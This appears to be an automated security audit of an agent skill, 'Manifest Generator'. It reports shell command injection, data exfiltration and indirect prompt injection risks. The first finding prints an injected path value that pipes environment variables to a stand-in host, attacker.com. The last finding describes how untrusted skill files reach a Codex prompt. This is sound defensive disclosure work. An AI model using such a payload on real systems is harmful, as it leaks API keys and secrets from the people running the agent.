NYC

Manifest Generator

Fail

Audited by Gen Agent Trust Hub on Feb 17, 2026

Risk Level: HIGH
Findings: COMMAND_EXECUTION, REMOTE_CODE_EXECUTION, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
  • COMMAND_EXECUTION (HIGH): The script generate-manifest.sh is vulnerable to shell command injection. The variable $RESOURCE_NAME, derived directly from the user-controlled --path input via the basename command, is used in an unquoted file redirection: > /tmp/manifest-$RESOURCE_NAME.yaml. An attacker can provide a skill_path such as project;curl http://attacker.com/$(env|base64); to execute arbitrary commands and exfiltrate data.
  • REMOTE_CODE_EXECUTION (HIGH): The command injection vulnerability allows an attacker to execute arbitrary code with the privileges of the agent running the skill. This can be used to install backdoors, download malicious payloads, or pivot to other systems.
  • DATA_EXFILTRATION (HIGH): Using the command injection, an attacker can easily exfiltrate the OPENAI_API_KEY (required as a precondition) or other sensitive configuration files found on the system.
  • PROMPT_INJECTION (LOW): The skill is vulnerable to Indirect Prompt Injection (Category 8) because it ingests untrusted data from local files and passes it to an LLM without sanitization.
      • Ingestion points: SKILL.md, index.js, and index.ts files located within the user-provided skill_path.
      • Boundary markers: None. The content is interpolated directly into the Codex prompt template without delimiters or instructions to ignore nested instructions.
      • Capability inventory: The skill can write files (cp), execute shell commands, and interact with the Codex API.
      • Sanitization: No sanitization or escaping is performed on the ingested file content before it is sent to the LLM.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Feb 17, 2026, 05:35 PM